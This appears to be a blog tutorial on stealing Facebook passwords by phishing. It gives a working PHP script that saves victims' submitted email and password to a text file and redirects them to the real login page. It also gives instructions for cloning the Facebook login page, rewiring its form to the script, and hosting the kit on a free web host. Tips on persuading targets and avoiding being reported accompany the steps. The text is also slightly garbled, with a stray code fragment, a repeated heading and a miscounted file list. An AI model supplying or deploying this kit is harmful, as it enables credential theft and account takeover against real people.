HACK FACEBOOK USING PHISHING
<html> <body> <?php $handle =
Phishing is the most widely used hacking method for hacking Facebook passwords. The most widely used technique in phishing is the use of Fake Login Pages. These fake login pages resemble the original login pages of sites like Yahoo , Gmail,SBI online etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack facebook account since it is the easiest one.
STEP 1:Creating Phishing.php file :
1. Even if you don't have any knowledge of php file simply copy the following script and save it as facebook.php .<html> <body> <?php $handle =
fopen("password.txt", "a");
fwrite($handle,$_POST["email"]);
fwrite($handle,"\n");
fwrite($handle,$_POST["pass"]);
fwrite($handle,"\n");
fwrite($handle,"\n");
fclose($handle);
header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit;
?> </body></html>
STEP 2: Creating index.html page :
STEP 2: Creating index.html page :
2.1 Open the Facebook login page then, Right click>View page source and paste it in notepad and save it as
index.html .
2.2 Open that index.html file with a Notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with
facebook.php .
Now you have all the following three files with you :
1. phishing.php
2. index.html
If you don't have your own web hosting account, goto any free web-hosting
and create a free web hosting espicially from http://www.000webhost.com
,reason behind this is it provides easy controlpanel
step 3:
After signing in up open CONTROL PANEL ,then FILE MANAGER now upload these two files in public folder
NOTE:
The attacker must have a very good convincing power to hack the facebook password with this method. Please try this method carefully as now it is widely known and the target may soon guess the attacker's intentions. The target may report the fake site and you may get in trouble.
0 comments:
Post a Comment